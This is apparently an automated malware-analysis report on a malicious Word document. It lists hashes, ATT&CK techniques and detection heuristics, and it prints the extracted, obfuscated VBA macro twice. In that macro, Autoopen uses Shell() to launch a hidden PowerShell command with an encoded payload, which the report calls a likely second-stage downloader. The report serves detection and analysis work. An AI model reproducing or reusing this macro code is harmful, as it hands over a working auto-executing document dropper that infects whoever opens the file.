Office (OLE) malware analysis — malicious · d8375e58c0ec308c

MALICIOUS

Office (OLE)

110.5 KB Created: 2018-05-24 20:12:00 Authoring application: Microsoft Office Word First seen: 2018-06-14

MD5: 4d10787d68abd71ef95f6bdf0c1d9283 SHA-1: 08d636ae290fe780e621993b5ea5ea624f8c106b SHA-256: d8375e58c0ec308cee289748d20a35e6ec80c708d868e3731c3539487d46f47c

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine, which is a common technique for automatically executing malicious code upon opening the document. The macro utilizes the Shell() function to execute a PowerShell command, indicated by the critical heuristic firing. The reconstructed PowerShell command is 'powershell -WindowStyle hidden -e IAAoACgAIgB7ADEAMwA3AH0AewA5ADcAfQB7A DEAMwA3AH0AewAwAH0AewA4ADcAf', which is likely used to download and execute a second-stage payload.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17249 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17249 bytes
SHA-256: `868d0b019675579ddefc93edf58e6751a3deb9256dae1bacc613490d61801333`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "CKOpklvcI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ciMtNJrrEDu() On Error Resume Next DlJNq = EbqWvl - Cos(zjEzj) * 1 - Chr(30763) / 4196 - ChrB(HVWBvD) tTzJM = 75837 BBonVj = nDKVF - Cos(jDiCzf) * 1 - Chr(19634) / 92345 - ChrB(mMvZp) XWlZTw = 65783 ciMtNJrrEDu = rnLTv + cWqivQb + JXFfllYfFk + TwYJfM + FPKVudD + FAMUX + NNBjKikbODS + UOVrDzq + zClITVzjTu + YErpwSIkhZW LtuTq = RLjpc - Cos(qozKhd) * 1 - Chr(5771) / 71348 - ChrB(crwtb) hZwlc = 1585 End Function Sub Autoopen() On Error Resume Next TIFMU = wbjFzJ - Cos(jZarqv) * 1 - Chr(94435) / 76767 - ChrB(BzZOFk) jDAfqV = 78350 RpIXIfjPWwm (ciMtNJrrEDu) VJbmn = lwkjjH - Cos(EvjDMk) * 1 - Chr(13118) / 13761 - ChrB(FVNpwB) iBOkUW = 64301 End Sub Function RpIXIfjPWwm(PHjVdOh) On Error Resume Next KAmQz = fZcmiI - Cos(bdkhw) * 1 - Chr(65719) / 6839 - ChrB(ZzzjB) hSXih = 26655 tLwqH = awkCRt - Cos(CXdCVo) * 1 - Chr(57469) / 26633 - ChrB(Dmjziz) FIwuG = 65619 DzCsYZIciv = Shell(kFHwUKslcC + Chr(vbKeyP) + bBiQwPJnE + PHjVdOh, vbHide) lrqkd = ouiqX - Cos(JoUIt) * 1 - Chr(69186) / 98327 - ChrB(IMKKO) pfuUwX = 39456 End Function Attribute VB_Name = "sLiEAEw" Function rnLTv() On Error Resume Next hwlCot = HEEikC - Cos(cIvLiO) * 1 - Chr(18767) / 38154 - ChrB(LhhGar) WuQsM = 92260 WSujT = "owersHeLL " + "-WinDow" + "sTyle hidden " + "-e IAAoACgAIg" + "B7ADEAM" + "gAyAH0AewA5AD" + "cAfQB7A" + "DEAMwA3AH0" hRJDi = OfiNw - Cos(kbiiw) * 1 - Chr(43620) / 27219 - ChrB(ZVHmLQ) hoUJVj = 7920 EZZKDSCCK = "AewAzAH0AewAx" + "ADAAOAB9AHsAM" + "wA5AH0AewAwAH0A" + "ewA4ADcAfQB" + "7ADEAMQA4AH0Aew" + "A5ADUAfQB7AD" + "EAMgA4AH0A" + "ewA0ADAAfQB7ADE" + "ANQB9AHsAM" + "gA2AH0AewA" tZKbz = fwTHGG - Cos(sPRWww) * 1 - Chr(58231) / 24156 - ChrB(WsSYj) ODdnjN = 71999 YdOOSK = "xADIAN" + "QB9AHsAMQ" + "AzAH0AewAxA" + "DEAMwB9AHsANA" + "A5AH0A" + "ewAyA" + "H0AewA" ovOQu = nfEJM - Cos(ZDnXjZ) * 1 - Chr(1905) / 66416 - ChrB(RIaCo) PiSZUG = 18628 AisJDS = "yADkAfQB7ADYAOA" + "B9AHsAOQAwAH0Ae" + "wA4ADgAfQ" + "B7ADEAMAA5AH0A" + "ewAxADA" akjkpW = oIMqRL - Cos(FDGMC) * 1 - Chr(5057) / 43587 - ChrB(nNFmYB) jriPaN = 74811 vhiDYLvp = "AMAB9AH" + "sAMQAy" + "ADYAfQB7" + "ADEAMQAxAH0" + "AewA4ADkAfQ" + "B7ADgANAB" + "9AHsA" + "MQA4AH" pLMLd = OMWZzY - Cos(SIDHG) * 1 - Chr(76813) / 93694 - ChrB(fDwqC) UICkC = 36442 RkHIvh = "0AewAxADAA" + "NQB9AHsAMQA5AH0" + "AewA1ADQAfQ" + "B7ADcAMQB9A" + "HsAMQA" + "yADMAfQB" + "7ADEAMwAyA" + "H0AewAyA" + "DMAfQB" RBqqs = YAiNYc - Cos(QjiIU) * 1 - Chr(48893) / 81117 - ChrB(KHNVba) DUozFO = 2913 OIjXTDrjA = "7ADQAMQB9AHsAN" + "AA4AH0AewA" + "0AH0AewAxAD" + "EANgB9AHsANAA0" + "AH0AewAy" + "ADAAfQB7ADQAMgB" + "9AHsAMQA" + "wADYAfQB" + "7ADQANwB9AHs" + "AOQAxA" NQNBX = wqaNj - Cos(kduQd) * 1 - Chr(55324) / 32206 - ChrB(udVRL) zOYaXH = 29203 lkjrjUFC = "H0AewAyADcAfQ" + "B7ADEAMQA5A" + "H0AewAx" + "ADIAMAB9AHsAN" rnLTv = WSujT + EZZKDSCCK + YdOOSK + AisJDS + vhiDYLvp + RkHIvh + OIjXTDrjA + lkjrjUFC End Function Function cWqivQb() On Error Resume Next RsHYSR = QnIuS - Cos(aaXUc) * 1 - Chr(96216) / 89593 - ChrB(juvpt) iRzqY = 87306 alMnwHkU = "gA2AH0AewA3ADk" + "AfQB7ADYAMA" + "B9AHsAMQAzA" + "DgAfQB7ADYA" + "fQB7ADgAMAB9A" LCJEK = tdpMWt - Cos(WoBGu) * 1 - Chr(18242) / 39609 - ChrB(hzLiY) fzoRWY = 1787 nTlfAaQPMn = "HsANgA3A" + "H0AewA3AD" + "cAfQB7" + "ADIAMQ" + "B9AHsAMQAzADYAf" + "QB7ADMAMA" XOPSw = jtiYv - Cos(zuQsw) * 1 - Chr(29339) / 47703 - ChrB(dEzWlE) dBuAV = 38641 mssXnPwnib = "B9AHsANwB9AHsAN" + "wAwAH0" + "AewAxADMANQB9" + "AHsAMQA0ADMAfQB" QmrbL = foPnn - Cos(wkivV) * 1 - Chr(13386) / 99826 - ChrB(lTRtj) nFsnYa = 8377 ttYjljDn = "7ADEANAAxAH0" + "AewA0ADMAfQB7" + "ADEANwB9AH" + "sANAA2AH0AewA2" + "ADQAfQB7ADEAMA" + "AxAH0A" + "ewAxADIANAB9AH" + "sAOAAzAH" + "0AewA5ADQ" + "AfQB7ADkAOQB9AH" iiBUEF = ppJil - Cos(dvGZt) * 1 - Chr(40787) / 23225 - ChrB(wUzvQ) avcPMw = 9641 ... (truncated)

SHA-256: 868d0b019675579ddefc93edf58e6751a3deb9256dae1bacc613490d61801333

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "CKOpklvcI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ciMtNJrrEDu()
On Error Resume Next
DlJNq = EbqWvl - Cos(zjEzj) * 1 - Chr(30763) / 4196 - ChrB(HVWBvD)
tTzJM = 75837
BBonVj = nDKVF - Cos(jDiCzf) * 1 - Chr(19634) / 92345 - ChrB(mMvZp)
XWlZTw = 65783
ciMtNJrrEDu = rnLTv + cWqivQb + JXFfllYfFk + TwYJfM + FPKVudD + FAMUX + NNBjKikbODS + UOVrDzq + zClITVzjTu + YErpwSIkhZW
LtuTq = RLjpc - Cos(qozKhd) * 1 - Chr(5771) / 71348 - ChrB(crwtb)
hZwlc = 1585
End Function
Sub Autoopen()
On Error Resume Next
TIFMU = wbjFzJ - Cos(jZarqv) * 1 - Chr(94435) / 76767 - ChrB(BzZOFk)
jDAfqV = 78350
RpIXIfjPWwm (ciMtNJrrEDu)
VJbmn = lwkjjH - Cos(EvjDMk) * 1 - Chr(13118) / 13761 - ChrB(FVNpwB)
iBOkUW = 64301
End Sub
Function RpIXIfjPWwm(PHjVdOh)
On Error Resume Next
KAmQz = fZcmiI - Cos(bdkhw) * 1 - Chr(65719) / 6839 - ChrB(ZzzjB)
hSXih = 26655
tLwqH = awkCRt - Cos(CXdCVo) * 1 - Chr(57469) / 26633 - ChrB(Dmjziz)
FIwuG = 65619
DzCsYZIciv = Shell(kFHwUKslcC + Chr(vbKeyP) + bBiQwPJnE + PHjVdOh, vbHide)
lrqkd = ouiqX - Cos(JoUIt) * 1 - Chr(69186) / 98327 - ChrB(IMKKO)
pfuUwX = 39456
End Function


Attribute VB_Name = "sLiEAEw"
Function rnLTv()
On Error Resume Next
hwlCot = HEEikC - Cos(cIvLiO) * 1 - Chr(18767) / 38154 - ChrB(LhhGar)
WuQsM = 92260
WSujT = "owersHeLL " + "-WinDow" + "sTyle hidden " + "-e IAAoACgAIg" + "B7ADEAM" + "gAyAH0AewA5AD" + "cAfQB7A" + "DEAMwA3AH0"
hRJDi = OfiNw - Cos(kbiiw) * 1 - Chr(43620) / 27219 - ChrB(ZVHmLQ)
hoUJVj = 7920
EZZKDSCCK = "AewAzAH0AewAx" + "ADAAOAB9AHsAM" + "wA5AH0AewAwAH0A" + "ewA4ADcAfQB" + "7ADEAMQA4AH0Aew" + "A5ADUAfQB7AD" + "EAMgA4AH0A" + "ewA0ADAAfQB7ADE" + "ANQB9AHsAM" + "gA2AH0AewA"
tZKbz = fwTHGG - Cos(sPRWww) * 1 - Chr(58231) / 24156 - ChrB(WsSYj)
ODdnjN = 71999
YdOOSK = "xADIAN" + "QB9AHsAMQ" + "AzAH0AewAxA" + "DEAMwB9AHsANA" + "A5AH0A" + "ewAyA" + "H0AewA"
ovOQu = nfEJM - Cos(ZDnXjZ) * 1 - Chr(1905) / 66416 - ChrB(RIaCo)
PiSZUG = 18628
AisJDS = "yADkAfQB7ADYAOA" + "B9AHsAOQAwAH0Ae" + "wA4ADgAfQ" + "B7ADEAMAA5AH0A" + "ewAxADA"
akjkpW = oIMqRL - Cos(FDGMC) * 1 - Chr(5057) / 43587 - ChrB(nNFmYB)
jriPaN = 74811
vhiDYLvp = "AMAB9AH" + "sAMQAy" + "ADYAfQB7" + "ADEAMQAxAH0" + "AewA4ADkAfQ" + "B7ADgANAB" + "9AHsA" + "MQA4AH"
pLMLd = OMWZzY - Cos(SIDHG) * 1 - Chr(76813) / 93694 - ChrB(fDwqC)
UICkC = 36442
RkHIvh = "0AewAxADAA" + "NQB9AHsAMQA5AH0" + "AewA1ADQAfQ" + "B7ADcAMQB9A" + "HsAMQA" + "yADMAfQB" + "7ADEAMwAyA" + "H0AewAyA" + "DMAfQB"
RBqqs = YAiNYc - Cos(QjiIU) * 1 - Chr(48893) / 81117 - ChrB(KHNVba)
DUozFO = 2913
OIjXTDrjA = "7ADQAMQB9AHsAN" + "AA4AH0AewA" + "0AH0AewAxAD" + "EANgB9AHsANAA0" + "AH0AewAy" + "ADAAfQB7ADQAMgB" + "9AHsAMQA" + "wADYAfQB" + "7ADQANwB9AHs" + "AOQAxA"
NQNBX = wqaNj - Cos(kduQd) * 1 - Chr(55324) / 32206 - ChrB(udVRL)
zOYaXH = 29203
lkjrjUFC = "H0AewAyADcAfQ" + "B7ADEAMQA5A" + "H0AewAx" + "ADIAMAB9AHsAN"
rnLTv = WSujT + EZZKDSCCK + YdOOSK + AisJDS + vhiDYLvp + RkHIvh + OIjXTDrjA + lkjrjUFC
End Function
Function cWqivQb()
On Error Resume Next
RsHYSR = QnIuS - Cos(aaXUc) * 1 - Chr(96216) / 89593 - ChrB(juvpt)
iRzqY = 87306
alMnwHkU = "gA2AH0AewA3ADk" + "AfQB7ADYAMA" + "B9AHsAMQAzA" + "DgAfQB7ADYA" + "fQB7ADgAMAB9A"
LCJEK = tdpMWt - Cos(WoBGu) * 1 - Chr(18242) / 39609 - ChrB(hzLiY)
fzoRWY = 1787
nTlfAaQPMn = "HsANgA3A" + "H0AewA3AD" + "cAfQB7" + "ADIAMQ" + "B9AHsAMQAzADYAf" + "QB7ADMAMA"
XOPSw = jtiYv - Cos(zuQsw) * 1 - Chr(29339) / 47703 - ChrB(dEzWlE)
dBuAV = 38641
mssXnPwnib = "B9AHsANwB9AHsAN" + "wAwAH0" + "AewAxADMANQB9" + "AHsAMQA0ADMAfQB"
QmrbL = foPnn - Cos(wkivV) * 1 - Chr(13386) / 99826 - ChrB(lTRtj)
nFsnYa = 8377
ttYjljDn = "7ADEANAAxAH0" + "AewA0ADMAfQB7" + "ADEANwB9AH" + "sANAA2AH0AewA2" + "ADQAfQB7ADEAMA" + "AxAH0A" + "ewAxADIANAB9AH" + "sAOAAzAH" + "0AewA5ADQ" + "AfQB7ADkAOQB9AH"
iiBUEF = ppJil - Cos(dvGZt) * 1 - Chr(40787) / 23225 - ChrB(wUzvQ)
avcPMw = 9641
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.